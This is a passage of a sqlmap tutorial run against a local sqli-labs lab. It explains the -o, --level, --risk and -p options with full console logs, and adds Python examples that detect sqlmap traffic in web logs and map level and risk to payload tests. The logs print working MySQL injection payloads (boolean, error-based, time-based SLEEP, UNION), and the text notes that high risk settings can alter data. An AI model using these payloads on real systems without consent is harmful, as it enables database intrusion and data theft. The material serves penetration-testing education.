[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:52:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:52:15] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[17:52:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:52:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:52:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:52:15] [INFO] target URL appears to have 3 columns in query
[17:52:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5685=5685 AND 'zDwo'='zDwo

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3544 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(3544=3544,1))),0x7176787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HmJC'='HmJC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))aNGQ) AND 'JWiB'='JWiB

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7025' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6355614c635050625177414166564173496f6c6558686978795257636b647a4b465a634b4a724275,0x7176787671),NULL-- ImLs
---
[17:52:17] [INFO] the back-end DBMS is MySQL
[17:52:17] [INFO] fetching banner
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:52:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:52:17] [WARNING] you haven't updated sqlmap for more than 210 days!!!

[*] ending @ 17:52:17 /2020-02-29/


4. One-click optimization

Parameter:

-o
Adding this parameter is equivalent to adding the following three optimization parameters at the same time:

  • --keep-alive
  • --null-connection
  • --threads=3

Run the test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -o --banner

Output:

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:10:58 /2020-02-29/

[18:10:59] [INFO] testing connection to the target URL
[18:10:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:10:59] [INFO] testing NULL connection to the target URL
[18:10:59] [INFO] testing if the target URL content is stable
[18:10:59] [INFO] target URL content is stable
[18:10:59] [INFO] testing if GET parameter 'id' is dynamic
[18:10:59] [INFO] GET parameter 'id' appears to be dynamic
[18:10:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:10:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[18:11:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:01] [WARNING] reflective value(s) found and filtering out
[18:11:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:11:01] [INFO] testing 'Generic inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:11:01] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:11:01] [INFO] testing 'MySQL inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:11:01] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:11:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:11:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:11:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:11:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:11:12] [INFO] target URL appears to have 3 columns in query
[18:11:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
---
[18:11:18] [INFO] the back-end DBMS is MySQL
[18:11:18] [INFO] fetching banner
[18:11:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:11:18] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 18:11:18 /2020-02-29/


If necessary, you can go to that directory, delete the cache and test again; the effect will then be more obvious.
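
Seen from the web server, the three options that -o bundles leave a recognisable footprint: sqlmap's default User-Agent, the HEAD followed by a suffix-range GET of the NULL-connection check, and bursts of concurrent requests from --threads. The following Python is an added example written for this page, not code from the post or from sqlmap: it runs simple detection logic over constructed log lines in an assumed custom Apache LogFormat that also records the Range request header (%{Range}i), and reports which signals fire per client address. The sample addresses, the log format and the thresholds are assumptions.

```python
"""Added example (not from the page or sqlmap): detecting the footprint of -o in web logs."""
import re
from collections import defaultdict
from datetime import datetime

# Assumed Apache LogFormat for these constructed lines (not the default combined format):
#   LogFormat "%h %t \"%r\" %>s %b \"%{User-Agent}i\" \"%{Range}i\"" probe
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ua>[^"]*)" "(?P<range>[^"]*)"$'
)

_SQLMAP_UA = "sqlmap/1.3.8#stable (http://sqlmap.org)"
_BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64)"
_PATH = "/sqli-labs/Less-1/?id=1"

# Constructed sample: one scanner (203.0.113.7) and one ordinary visitor (198.51.100.4).
SAMPLE_LOG = [
    f'203.0.113.7 [29/Feb/2020:17:43:01 +0800] "GET {_PATH} HTTP/1.1" 200 720 "{_SQLMAP_UA}" "-"',
    f'203.0.113.7 [29/Feb/2020:17:43:01 +0800] "HEAD {_PATH} HTTP/1.1" 200 - "{_SQLMAP_UA}" "-"',
    f'203.0.113.7 [29/Feb/2020:17:43:01 +0800] "GET {_PATH} HTTP/1.1" 206 1 "{_SQLMAP_UA}" "bytes=-1"',
] + [
    # ten probes inside one second: the shape --threads 10 produces
    f'203.0.113.7 [29/Feb/2020:17:43:02 +0800] "GET {_PATH} HTTP/1.1" 206 1 "{_SQLMAP_UA}" "bytes=-1"'
    for _ in range(10)
] + [
    f'198.51.100.4 [29/Feb/2020:17:43:05 +0800] "GET {_PATH} HTTP/1.1" 200 720 "{_BROWSER_UA}" "-"',
    f'198.51.100.4 [29/Feb/2020:17:43:09 +0800] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 701 "{_BROWSER_UA}" "-"',
]

BURST_THRESHOLD = 5       # requests from one address within a single second
PROBE_WINDOW_SECONDS = 5  # HEAD and suffix-range GET must be this close to count as one check


def parse_log(lines):
    """Turn matching lines into dicts; lines in another format are skipped, not guessed at."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events.append(e)
    return events


def detect(events):
    """Return {client_ip: sorted list of signal names} for clients with at least one signal."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        signals = set()

        # 1. Default User-Agent; sqlmap only changes it with --user-agent / --random-agent.
        if any(e["ua"].startswith("sqlmap/") for e in evs):
            signals.add("sqlmap-user-agent")

        # 2. NULL-connection check: HEAD on a path, then a GET for the same path with a
        #    suffix range (Range: bytes=-N) shortly afterwards.
        for head in (e for e in evs if e["method"] == "HEAD"):
            if any(e["method"] == "GET" and e["path"] == head["path"]
                   and e["range"].startswith("bytes=-")
                   and 0 <= (e["ts"] - head["ts"]).total_seconds() <= PROBE_WINDOW_SECONDS
                   for e in evs):
                signals.add("null-connection-probe")
                break

        # 3. Concurrency: many requests landing in the same second.
        per_second = defaultdict(int)
        for e in evs:
            per_second[e["ts"]] += 1
        if max(per_second.values()) >= BURST_THRESHOLD:
            signals.add("request-burst")

        if signals:
            findings[ip] = sorted(signals)
    return findings


def run_sample():
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for ip, signals in run_sample().items():
        print(ip, ", ".join(signals))
```

Only the scanner address trips all three signals; the visitor trips none. The User-Agent check is the weakest of the three, since --random-agent removes it, while the HEAD-plus-suffix-range pair and the per-second burst survive that option.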

Part 2: Customizing sqlmap's detection parameters

View sqlmap's help:

python sqlmap.py -hh

Some of the relevant output:

Detection:                                                                
  These options can be used to customize the detection phase              
                                                                          
  --level=LEVEL       Level of tests to perform (1-5, default 1)          
  --risk=RISK         Risk of tests to perform (1-3, default 1)           
  --string=STRING     String to match when query is evaluated to True     
  --not-string=NOT..  String to match when query is evaluated to False    
  --regexp=REGEXP     Regexp to match when query is evaluated to True     
  --code=CODE         HTTP code to match when query is evaluated to True  
  --smart             Perform thorough tests only if positive heuristic(s)
  --text-only         Compare pages based only on the textual content     
  --titles            Compare pages based only on their titles            

This covers two of those parameters: --level and --risk.

1. sqlmap detection level

Parameter:
--level
This parameter specifies the detection level; there are 5 levels, from 1 to 5.
The default is 1, meaning the least thorough detection; correspondingly, level 5 means the most thorough.
Level 1 tests GET and POST parameters;
level 2 additionally tests cookies;
level 3 additionally tests the User-Agent and Referer headers;
the higher the level, the more content is tested.
Specifically, you can look at the sqlmap/data/xml/payloads directory (older sqlmap versions may differ and use xml/payloads instead); its contents look like this:

    <test>
        <title>AND boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>AND [INFERENCE]</vector>
        <request>
            <payload>AND [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>

    <test>
        <title>OR boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>2</where>
        <vector>OR [INFERENCE]</vector>
        <request>
            <payload>OR [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>

    <test>
        <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>OR NOT [INFERENCE]</vector>
        <request>
            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>

Test example:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner --level 2 -v 5

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:29:07 /2020-02-29/

[18:29:07] [DEBUG] cleaning up configuration parameters
[18:29:07] [DEBUG] setting the HTTP timeout
[18:29:07] [DEBUG] setting the HTTP User-Agent header
[18:29:07] [DEBUG] creating HTTP requests opener object
[18:29:08] [INFO] resuming back-end DBMS 'mysql'
[18:29:08] [INFO] testing connection to the target URL
[18:29:08] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1--banner HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[18:29:08] [DEBUG] declared web page charset 'utf-8'
[18:29:08] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 10:29:08 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1--banner
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[18:29:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[18:29:08] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 18:29:08 /2020-02-29/


2. sqlmap risk level

Parameter:
--risk
This parameter specifies the risk level; there are 3 levels, from 1 to 3.
The default risk level is 1, which in most cases is harmless to the test target;
risk level 2 adds time-based injection tests, and risk level 3 adds OR-based tests.
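
How --level and --risk interact with the <level> and <risk> fields of the payload XML shown in the previous section can be checked directly. The Python below is an added example, not the post's code and not sqlmap's own implementation: it parses the three <test> entries quoted above (wrapped in a root element added here) and applies the selection rule as I understand it, which is stated as an assumption: a test is used only when its own level and risk are both within the values given. The function names are mine.

```python
"""Added example (not from the page or sqlmap): which payload tests --level/--risk let through."""
import xml.etree.ElementTree as ET

# The three <test> entries quoted from the payload XML above, wrapped in a root element
# added here so they parse as one document.
PAYLOADS_XML = """<root>
<test>
  <title>AND boolean-based blind - WHERE or HAVING clause</title>
  <stype>1</stype><level>1</level><risk>1</risk>
  <clause>1,8,9</clause><where>1</where>
  <vector>AND [INFERENCE]</vector>
  <request><payload>AND [RANDNUM]=[RANDNUM]</payload></request>
  <response><comparison>AND [RANDNUM]=[RANDNUM1]</comparison></response>
</test>
<test>
  <title>OR boolean-based blind - WHERE or HAVING clause</title>
  <stype>1</stype><level>1</level><risk>3</risk>
  <clause>1,9</clause><where>2</where>
  <vector>OR [INFERENCE]</vector>
  <request><payload>OR [RANDNUM]=[RANDNUM]</payload></request>
  <response><comparison>OR [RANDNUM]=[RANDNUM1]</comparison></response>
</test>
<test>
  <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
  <stype>1</stype><level>3</level><risk>3</risk>
  <clause>1,9</clause><where>1</where>
  <vector>OR NOT [INFERENCE]</vector>
  <request><payload>OR NOT [RANDNUM]=[RANDNUM]</payload></request>
  <response><comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison></response>
</test>
</root>"""


def load_tests(xml_text):
    """Read title, level, risk and payload template of every <test>."""
    root = ET.fromstring(xml_text)
    return [
        {
            "title": t.findtext("title"),
            "level": int(t.findtext("level")),
            "risk": int(t.findtext("risk")),
            "payload": t.findtext("request/payload"),
        }
        for t in root.findall("test")
    ]


def partition_tests(tests, level=1, risk=1):
    """Split tests into (selected titles, [(skipped title, reason)]).

    Assumed rule (my reading of sqlmap, consistent with the text above): a test is used
    only when its own <level> and <risk> are both within --level/--risk; defaults are 1/1.
    """
    if not (1 <= level <= 5 and 1 <= risk <= 3):
        raise ValueError("--level takes 1-5 and --risk takes 1-3")
    selected, skipped = [], []
    for t in tests:
        if t["level"] > level:
            skipped.append((t["title"], f"needs --level {t['level']}"))
        elif t["risk"] > risk:
            skipped.append((t["title"], f"needs --risk {t['risk']}"))
        else:
            selected.append(t["title"])
    return selected, skipped


if __name__ == "__main__":
    tests = load_tests(PAYLOADS_XML)
    for lvl, rsk in ((1, 1), (1, 3), (3, 3)):
        chosen, dropped = partition_tests(tests, lvl, rsk)
        print(f"--level {lvl} --risk {rsk}: run {chosen}; skip {dropped}")
```

With the defaults only the AND test is used; raising --risk to 3 adds the OR test, and the OR NOT variant needs --level 3 as well. The skipped list with its reason is the quickest way to answer "why did sqlmap never try that payload" when reading a -v 5 log.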

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner --risk 2 -v 5

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                 
|___|_  [.]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 18:33:59 /2020-02-29/                                                                                                                      
                                                                                                                                                          
[18:33:59] [DEBUG] cleaning up configuration parameters                                                                                                   
[18:34:00] [DEBUG] setting the HTTP timeout                                                                                                               
[18:34:00] [DEBUG] setting the HTTP User-Agent header                                                                                                     
[18:34:00] [DEBUG] creating HTTP requests opener object                                                                                                   
[18:34:00] [INFO] resuming back-end DBMS 'mysql'                                                                                                          
[18:34:00] [INFO] testing connection to the target URL                                                                                                    
[18:34:00] [TRAFFIC OUT] HTTP request [#1]:                                                                                                               
GET /sqli-labs/Less-1/?id=1 HTTP/1.1                                                                                                                      
Cache-control: no-cache                                                                                                                                   
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)                                                                                                       
Host: 127.0.0.1                                                                                                                                           
Accept: */*                                                                                                                                               
Accept-encoding: gzip,deflate                                                                                                                             
Connection: close                                                                                                                                         
                                                                                                                                                          
[18:34:00] [DEBUG] declared web page charset 'utf-8'                                                                                                      
[18:34:00] [TRAFFIC IN] HTTP response [#1] (200 OK):                                                                                                      
Date: Sat, 29 Feb 2020 10:34:00 GMT                                                                                                                       
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a                                                                                             
X-Powered-By: PHP/7.3.4                                                                                                                                   
Connection: close                                                                                                                                         
Transfer-Encoding: chunked                                                                                                                                
Content-Type: text/html; charset=UTF-8                                                                                                                    
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1                                                                                                           
sqlmap resumed the following injection point(s) from stored session:                                                                                      
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                               
    Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE                                                                                                         
    Vector: AND [INFERENCE]                                                                                                                               
                                                                                                                                                          
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn                                                                         
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])                                             
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: Generic UNION query (NULL) - 3 columns                                                                                                         
    Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL-- -                                                                                                       
---                                                                                                                                                       
[18:34:00] [INFO] the back-end DBMS is MySQL                                                                                                              
[18:34:00] [INFO] fetching banner                                                                                                                         
[18:34:00] [DEBUG] resuming configuration option 'string' ('Your')                                                                                        
[18:34:00] [DEBUG] resuming configuration option 'optimize' (True)                                                                                        
[18:34:00] [DEBUG] turning off switch '--null-connection' used indirectly by switch '-o'                                                                  
[18:34:00] [DEBUG] performed 0 queries in 0.00 seconds                                                                                                    
back-end DBMS: MySQL >= 5.0                                                                                                                               
banner: '5.7.26'                                                                                                                                          
[18:34:00] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 18:34:00 /2020-02-29/                                                                                                                        
                                                                                                                                                          
                                                                                                                                                          

When the risk level is set to 3 and the injection point is inside an UPDATE statement, the data in the database will be modified.

Three. Specifying the injection location in sqlmap

1. Specifying the injection parameters in sqlmap

By default sqlmap tests all GET and POST parameters. At level 2 or higher it also tests cookie parameters, and at level 3 or higher the User-Agent and Referer headers.
You can also specify a comma-separated list of parameters to test by hand; parameters in this list are tested regardless of the level. That is what -p is for.
If you do not want a parameter tested, use --skip.

-p parameter test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,user-agent" --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:46:17 /2020-02-29/

[19:46:17] [INFO] testing connection to the target URL
[19:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:46:17] [INFO] testing if the target URL content is stable
[19:46:17] [INFO] target URL content is stable
[19:46:18] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:46:18] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:46:18] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[19:46:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:20] [WARNING] reflective value(s) found and filtering out
[19:46:20] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:46:20] [INFO] testing 'Generic inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:46:20] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:46:20] [INFO] testing 'MySQL inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:46:20] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:46:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:46:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:46:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:46:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
